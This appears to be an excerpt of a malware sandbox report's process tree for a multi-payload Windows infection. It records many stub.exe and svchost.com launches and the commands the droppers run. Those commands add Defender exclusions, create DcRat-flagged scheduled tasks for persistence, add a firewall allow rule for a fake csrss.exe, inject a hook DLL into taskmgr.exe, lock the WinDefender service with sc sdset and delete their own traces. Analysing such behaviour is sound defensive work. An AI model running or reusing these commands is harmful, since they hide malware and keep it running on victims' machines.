        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        38⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:5108
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        39⤵
        Drops file in Windows directory
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        40⤵
        
        PID:2188
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        41⤵
        Drops file in Windows directory
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        42⤵
        Modifies registry class
        
        PID:5224
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        43⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        44⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:940
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        45⤵
        Drops file in Windows directory
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        46⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:3400
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        47⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        48⤵
        
        PID:2296
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        49⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        50⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:3788
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        51⤵
        Drops file in Windows directory
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        52⤵
        
        PID:976
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        53⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        54⤵
        
        PID:5128
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        55⤵
        Drops file in Windows directory
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        56⤵
        
        PID:4076
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        57⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        58⤵
        
        PID:388
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        59⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        60⤵
        
        PID:5720
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        61⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        62⤵
        
        PID:5264
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        63⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        64⤵
        Executes dropped EXE
        
        PID:3136
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        65⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        66⤵
        
        PID:4128
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        67⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        68⤵
        
        PID:2216
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        69⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        70⤵
        
        PID:1308
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        71⤵
        Drops file in Windows directory
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        72⤵
        
        PID:3428
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        73⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        74⤵
        
        PID:3064
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        75⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        76⤵
        
        PID:1984
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        77⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        78⤵
        
        PID:4180
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        79⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        80⤵
        
        PID:2444
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        81⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        82⤵
        
        PID:560
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        83⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        84⤵
        
        PID:5716
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        85⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        86⤵
        Modifies registry class
        
        PID:4268
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        87⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        88⤵
        
        PID:4820
        
        C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        89⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        90⤵
        
        PID:5888
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        91⤵
        
        PID:3932
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        92⤵
        
        PID:5600
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        93⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549181\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x222614,0x222620,0x22262c
        76⤵
        
        PID:5816
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SVCPJU~1.EXE"
    3⤵
    - Drops file in Windows directory
    PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\Files\SVCPJU~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\SVCPJU~1.EXE
      4⤵
      PID:3920
    - - C:\Windows\SysWOW64\notepad.exe
        
        \??\C:\Windows\SysWOW64\notepad.exe
        5⤵
        
        PID:4028
      - C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
        6⤵
        
        PID:5228
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE"
    3⤵
    PID:4884
  - - C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~1.EXE
      4⤵
      Loads dropped DLL
      PID:4396
    - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6020
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        6⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        7⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3316
    - - C:\Users\Admin\AppData\Local\Temp\nsdD2CF.tmp
        
        C:\Users\Admin\AppData\Local\Temp\nsdD2CF.tmp
        5⤵
        
        PID:1520
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsdD2CF.tmp" & del "C:\ProgramData\*.dll"" & exit
        6⤵
        
        PID:200
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c timeout /t 5 & del /f /q C:\Users\Admin\AppData\Local\Temp\nsdD2CF.tmp & del "C:\ProgramData\*.dll"" & exit
        7⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:6108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2540
        6⤵
        Program crash
        
        PID:3672
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:5216
  - - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
      C:\Users\Admin\AppData\Local\Temp\Files\more.exe
      4⤵
      PID:2352
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
        5⤵
        
        PID:3920
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe
        6⤵
        
        PID:5964
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCD89.tmp"
        5⤵
        
        PID:5776
      - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /TN Updates\UiKVWpFsayx /XML C:\Users\Admin\AppData\Local\Temp\tmpCD89.tmp
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2776
    - - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
        5⤵
        
        PID:5204
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
        6⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn images /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
        7⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn images /tr '"C:\Users\Admin\AppData\Roaming\images.exe"'
        8⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1180
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp31F.tmp.bat""
        6⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:4108
        
        C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        7⤵
        
        PID:4540
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
        8⤵
        
        PID:5112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe
        9⤵
        
        PID:5588
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD062.tmp"
        8⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /TN Updates\UiKVWpFsayx /XML C:\Users\Admin\AppData\Local\Temp\tmpD062.tmp
        9⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2440
        
        C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        8⤵
        
        PID:396
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rty31.exe"
    3⤵
    PID:1272
  - - C:\Users\Admin\AppData\Local\Temp\Files\rty31.exe
      C:\Users\Admin\AppData\Local\Temp\Files\rty31.exe
      4⤵
      PID:1040
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
    3⤵
    PID:6024
  - - C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
      C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
      4⤵
      PID:1640
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\KHUPDA~1.EXE"
    3⤵
    PID:4588
  - - C:\Users\Admin\AppData\Local\Temp\Files\KHUPDA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\KHUPDA~1.EXE
      4⤵
      PID:1188
    - - C:\Users\Admin\AppData\Local\Temp\Files\KHUPDA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\Files\KHUPDA~1.EXE
        5⤵
        
        PID:1148
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winhost" /tr '"C:\Users\Admin\AppData\Local\Temp\winhost.exe"' & exit
        6⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn winhost /tr '"C:\Users\Admin\AppData\Local\Temp\winhost.exe"' & exit
        7⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn winhost /tr '"C:\Users\Admin\AppData\Local\Temp\winhost.exe"'
        8⤵
        DcRat
        Creates scheduled task(s)
        
        PID:6056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2F60.tmp.bat""
        6⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\winhost.exe"
        7⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\winhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhost.exe
        8⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\winhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhost.exe
        8⤵
        
        PID:776
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"
    3⤵
    PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
      C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
      4⤵
      PID:536
    - - C:\Windows\SysWOW64\WSCript.exe
        
        WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
        5⤵
        
        PID:5400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
        5⤵
        
        PID:1860
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:1648
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3332
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\28888C~1.EXE"
    3⤵
    PID:240
  - - C:\Users\Admin\AppData\Local\Temp\Files\28888C~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\28888C~1.EXE
      4⤵
      PID:1220
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE"
        5⤵
        
        PID:2776
      - C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE
        6⤵
        
        PID:3460
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        5⤵
        
        PID:4288
      - C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        6⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        7⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:1896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        8⤵
        
        PID:1664
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:3316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:1564
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        8⤵
        
        PID:408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:1004
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        9⤵
        DcRat
        Creates scheduled task(s)
        
        PID:7912
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        9⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        9⤵
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        9⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        9⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        9⤵
        
        PID:3836
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        9⤵
        DcRat
        Creates scheduled task(s)
        
        PID:4980
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        9⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        10⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        11⤵
        Launches sc.exe
        
        PID:7232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 900
        8⤵
        Program crash
        
        PID:6836
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FORTNI~1.EXE"
    3⤵
    PID:6008
  - - C:\Users\Admin\AppData\Local\Temp\Files\FORTNI~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\FORTNI~1.EXE
      4⤵
      PID:5940
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
    3⤵
    PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
      C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
      4⤵
      PID:5896
    - - C:\Users\Admin\AppData\Local\Temp\is-8R2BJ.tmp\is-9GBVE.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8R2BJ.tmp\is-9GBVE.tmp" /SL4 $20310 "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe" 9527549 52224
        5⤵
        
        PID:1572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ping 127.0.0.1 && del C:\Users\Admin\AppData\Local\Temp\Files\file.exe >> NUL
      4⤵
      PID:5440
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:1492
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\Project7.exe"
    3⤵
    PID:2864
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\freas.exe"
    3⤵
    PID:5104
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PAETools.exe"
    3⤵
    PID:5340
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
    3⤵
    PID:4032
  - - C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
      C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
      4⤵
      Drops file in Windows directory
      Modifies registry class
      PID:2296
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA674.tmp.bat""
        5⤵
        
        PID:760
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:3124
      - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        
        PID:1640
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        7⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        8⤵
        
        PID:3532
        
